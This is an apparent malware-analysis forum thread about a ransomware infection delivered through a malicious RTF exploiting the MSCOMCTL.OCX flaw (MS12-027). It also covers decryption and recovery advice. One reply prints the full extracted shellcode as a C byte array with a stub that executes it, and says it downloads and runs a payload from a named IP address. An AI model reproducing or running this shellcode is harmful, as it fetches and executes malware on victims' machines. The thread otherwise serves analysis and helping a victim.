[TwinHeadedEagle]

Please merge topic if already exist

Came across this exploit

Virustotal report --> https://www.virustotal.com/en/file/e1d0 ... /analysis/

EDIT: Just to mention that this malware encrypted .doc .pdf .rar and similar files

I think it is PGP Coder--> http://en.m.wikipedia.org/wiki/PGPCoder

Can you tell me if it is possible to recover these corrupted files somehow?

[EP_X0FF]

The shellcode at the end of this RTF document is responsible for load/start of hxxp://85.17.207.1/updates.exe, server is down.
Whoever want to play with this piece of crap, it is below.

Code: Select all

unsigned char sc[758] = {
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x3C, 0x74, 0x43, 0xBE, 0x47, 0x40, 0x46, 0x05, 
	0x79, 0x0B, 0xD4, 0x0D, 0xB5, 0xB1, 0x27, 0x9F, 0x97, 0x90, 0x41, 0xB8, 0xB2, 0x24, 0x42, 0x73, 
	0x48, 0x86, 0xE0, 0x1D, 0x35, 0x76, 0x7E, 0x7C, 0x4F, 0x0C, 0x14, 0xBF, 0x93, 0x4E, 0xA8, 0x15, 
	0x98, 0x7A, 0x2F, 0xB6, 0x1B, 0xF7, 0xE1, 0x25, 0xBA, 0x13, 0xF5, 0x2C, 0xB0, 0x03, 0xFC, 0x81, 
	0xE2, 0x66, 0xA9, 0x67, 0x7B, 0x34, 0x8D, 0x71, 0x74, 0x71, 0x21, 0xC1, 0xE3, 0x7C, 0x4A, 0xB3, 
	0x8C, 0xE0, 0x75, 0x2D, 0x91, 0x98, 0x7F, 0x78, 0x76, 0x73, 0x70, 0x3A, 0xD3, 0xE2, 0x3B, 0xFC, 
	0xB4, 0x80, 0xEB, 0x49, 0x97, 0x7B, 0x3D, 0x72, 0x2D, 0x77, 0x25, 0xB3, 0x35, 0xB5, 0xB0, 0x27, 
	0x0D, 0x1D, 0x08, 0xF9, 0x85, 0xF5, 0x31, 0xD6, 0x3C, 0xA9, 0x40, 0x90, 0xB6, 0x66, 0xA8, 0x34, 
	0xB8, 0x14, 0xB9, 0x7D, 0x4A, 0x39, 0xF8, 0x3F, 0xB2, 0x2A, 0xD5, 0x18, 0xD4, 0x43, 0x2F, 0x99, 
	0x79, 0x48, 0x47, 0xB1, 0x4B, 0x7A, 0x42, 0x4E, 0x7E, 0x2B, 0xF6, 0xE1, 0x37, 0x8D, 0xBF, 0xB7, 
	0x9F, 0x05, 0xBB, 0x7C, 0x2C, 0xBE, 0x7E, 0x46, 0x7A, 0x38, 0xE2, 0x41, 0x78, 0x20, 0xD2, 0xFD, 
	0x96, 0x7B, 0x0A, 0xE0, 0x0C, 0x73, 0x1C, 0x67, 0x70, 0x04, 0x92, 0x93, 0x72, 0x24, 0x9B, 0x74, 
	0x4F, 0xBA, 0x7F, 0x28, 0xE3, 0x15, 0xB8, 0x71, 0x29, 0xE1, 0x0C, 0xB7, 0x91, 0x3C, 0x98, 0xB4, 
	0x77, 0x42, 0x67, 0xB9, 0x7D, 0x34, 0x19, 0xEB, 0x3D, 0x8D, 0x96, 0x79, 0x27, 0x05, 0x9F, 0xB2, 
	0x93, 0x75, 0x25, 0xA8, 0x15, 0x35, 0x2D, 0x46, 0xA9, 0xF5, 0xBE, 0x2F, 0xB6, 0x2C, 0x76, 0x04, 
	0x97, 0xB5, 0xBF, 0x0D, 0x99, 0xBA, 0x9B, 0xB1, 0xB3, 0x47, 0x30, 0xD6, 0xBB, 0x4B, 0x3F, 0x4E, 
	0x14, 0x1D, 0x4A, 0x90, 0x66, 0x48, 0x40, 0xD4, 0x49, 0x43, 0xFD, 0x4F, 0xFC, 0x92, 0xB0, 0x24, 
	0xF9, 0x41, 0xD5, 0x1C, 0x37, 0xF8, 0xEB, 0x04, 0xB3, 0x92, 0x0C, 0x43, 0x81, 0xC4, 0x54, 0xF2, 
	0xFF, 0xFF, 0xBA, 0x61, 0xB5, 0x1D, 0x02, 0xD9, 0xCF, 0xD9, 0x74, 0x24, 0xF4, 0x5E, 0x31, 0xC9, 
	0xB1, 0x6F, 0x83, 0xEE, 0xFC, 0x31, 0x56, 0x0F, 0x03, 0x56, 0x6E, 0x57, 0xE8, 0xFE, 0x98, 0x1E, 
	0x13, 0xFF, 0x58, 0x41, 0x9D, 0x1A, 0x69, 0x53, 0xF9, 0x6F, 0xDB, 0x63, 0x89, 0x22, 0xD7, 0x08, 
	0xDF, 0xD6, 0x6C, 0x7C, 0xC8, 0xD9, 0xC5, 0xCB, 0x2E, 0xD7, 0xD6, 0xFD, 0xEE, 0xBB, 0x14, 0x9F, 
	0x92, 0xC1, 0x48, 0x7F, 0xAA, 0x09, 0x9D, 0x7E, 0xEB, 0x74, 0x6D, 0xD2, 0xA4, 0xF3, 0xDF, 0xC3, 
	0xC1, 0x46, 0xE3, 0xE2, 0x05, 0xCD, 0x5B, 0x9D, 0x20, 0x12, 0x2F, 0x17, 0x2A, 0x43, 0x9F, 0x2C, 
	0x64, 0x7B, 0x94, 0x6B, 0x55, 0x7A, 0x79, 0x68, 0xA9, 0x35, 0xF6, 0x5B, 0x59, 0xC4, 0xDE, 0x95, 
	0xA2, 0xF6, 0x1E, 0x79, 0x9D, 0x36, 0x93, 0x83, 0xD9, 0xF1, 0x4B, 0xF6, 0x11, 0x02, 0xF6, 0x01, 
	0xE2, 0x78, 0x2C, 0x87, 0xF7, 0xDB, 0xA7, 0x3F, 0xDC, 0xDA, 0x64, 0xD9, 0x97, 0xD1, 0xC1, 0xAD, 
	0xF0, 0xF5, 0xD4, 0x62, 0x8B, 0x02, 0x5D, 0x85, 0x5C, 0x83, 0x25, 0xA2, 0x78, 0xCF, 0xFE, 0xCB, 
	0xD9, 0xB5, 0x51, 0xF3, 0x3A, 0x11, 0x0E, 0x51, 0x30, 0xB0, 0x5B, 0xE3, 0x1B, 0xDD, 0xF5, 0x89, 
	0xD7, 0x1D, 0x61, 0x25, 0x71, 0x70, 0x18, 0x40, 0x67, 0xD8, 0xB2, 0x1E, 0x1F, 0xC7, 0x45, 0x60, 
	0x0A, 0x36, 0xB6, 0xC9, 0xE2, 0x6E, 0x1F, 0xA0, 0x64, 0xAB, 0xC9, 0x35, 0xD2, 0x34, 0x20, 0x2E, 
	0x7C, 0x90, 0xFB, 0x78, 0x2C, 0x77, 0x91, 0x79, 0x9E, 0x26, 0x0F, 0x2E, 0x73, 0x99, 0xA7, 0x99, 
	0xFA, 0x86, 0xF1, 0xD9, 0x28, 0x53, 0xB2, 0x7C, 0xE2, 0x76, 0x1E, 0x17, 0x04, 0x45, 0xBE, 0x63, 
	0x56, 0xFB, 0xEC, 0x3A, 0x05, 0xAB, 0x78, 0x56, 0xFC, 0x65, 0x43, 0x57, 0x2A, 0xF0, 0x75, 0xCD, 
	0xC5, 0x58, 0x11, 0x92, 0xD5, 0x5E, 0xE1, 0x1B, 0xF9, 0x35, 0xE5, 0x4B, 0x90, 0xD6, 0xB3, 0x03, 
	0x11, 0xAF, 0xA5, 0x52, 0x26, 0xFA, 0xE8, 0xA5, 0x8E, 0x52, 0x5D, 0x0D, 0x67, 0x35, 0x4C, 0xB7, 
	0x9F, 0xBE, 0x71, 0x62, 0x1A, 0x80, 0xF8, 0x92, 0x6E, 0x0E, 0x86, 0xD1, 0x70, 0x10, 0x86, 0xC2, 
	0xA0, 0xF9, 0x09, 0x14, 0x43, 0xFA, 0xFD, 0xB9, 0xBC, 0x05, 0x02, 0xEE, 0x37, 0x8A, 0x98, 0x90, 
	0xC3, 0x0F, 0x4E, 0x36, 0x54, 0xB5, 0x8E, 0x53, 0xCF, 0x04, 0x4E, 0xFC, 0x40, 0x0D, 0x4C, 0x69, 
	0x63, 0x81, 0x3A, 0x6F, 0x09, 0x23, 0xED, 0x07, 0x17, 0xD5, 0xCB, 0x97, 0x58, 0xCF, 0x78, 0x16, 
	0x67, 0x96, 0xC6, 0x5D, 0x64, 0x7E, 0xF2, 0x0A, 0xE7, 0xCC, 0xDE, 0xBA, 0xC6, 0x0C, 0xAA, 0xB8, 
	0x78, 0xDC, 0x84, 0xD6, 0x6A, 0x48, 0xA1, 0xC5, 0x74, 0xA1, 0x34, 0xC9, 0xFF, 0x67, 0x6E, 0x4F, 
	0x3F, 0x03, 0x98, 0x25, 0xC0, 0xB8, 0xF4, 0x34, 0x84, 0x64, 0xF8, 0x16, 0x56, 0x0D, 0x2D, 0xC0, 
	0xF6, 0x96, 0xD2, 0x3B, 0x85, 0xC5, 0x28, 0x2F, 0x44, 0x46, 0x58, 0x69, 0xCF, 0xEE, 0xCA, 0x8A, 
	0x25, 0x9A, 0xEA, 0x23, 0xAE, 0x6A, 0x61, 0xA4, 0xA9, 0x72, 0xA0, 0x51, 0xB6, 0xE4, 0xBA, 0x13, 
	0x14, 0xA2, 0xC5, 0x89, 0xB1, 0xDB, 0xC6, 0xCD, 0xBD, 0xA9, 0x48, 0x56, 0x23, 0x26, 0xCD, 0xE5, 
	0x8D, 0xA3, 0x75, 0x6F, 0xD2, 0xC3, 0x82, 0x90, 0x2D, 0xEC, 0xB4, 0x5B, 0xFC, 0x22, 0xF3, 0x8D, 
	0x32, 0x75, 0xCC, 0xFF, 0x03, 0x75
};

int __cdecl main(
	VOID
	) 
{
	int (*func)();
	func = (int (*)()) sc;
	(int)(*func)();
}

[TwinHeadedEagle]

Thanks, but is it possible to recover corrupted files?

[Blaze]

If it really encrypts those files and you don't have a decryption key, then your best bet would be backups (if any) or using PhotoRec:
http://www.cgsecurity.org/wiki/PhotoRec

[EP_X0FF]

hxxp://85.17.207.1/updates.exe, server is down.

Thanks, but is it possible to recover corrupted files?

Crystal ball is not available here.

[TwinHeadedEagle]

You mean, sample of malware is needed so we may found out encryption key?

[EP_X0FF]

This means I don't know what this updates.exe file do as I don't have it. If it really GpCode ransom, then say goodbye to these files - RSA-1024 + AES-256 is deadend. You only can try to recover original files, if they were deleted by ransom after encryption, otherwise nohow.

[TwinHeadedEagle]

I managed to get sample

[EP_X0FF]

Try this ftp://ftp.drweb.com/pub/drweb/tools/te215decrypt.exe

Do not remove C:\crypt.txt.

If you have it, and it is unmodified - run decryptor without parameters.
If you don't have it try this decryptor with parameter = ID of your system volume, can be retrieved through "dir" command. In some cases decryption is possible.

In general:
1) Always do backup of most important files;
2) Always use up-to-date full patched software. This particular Encoder campaign is email based and use very old already patched MSCOMCTL.OCX vulnerability. See MS12-027, KB2664258.

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers “system state” corruption, as exploited in the wild in April 2012, aka “MSCOMCTL.OCX RCE Vulnerability.”

Install KB2597112 (Office 2003), KB2598041 (Office 2007 Suites), KB2598039 (Office 2010).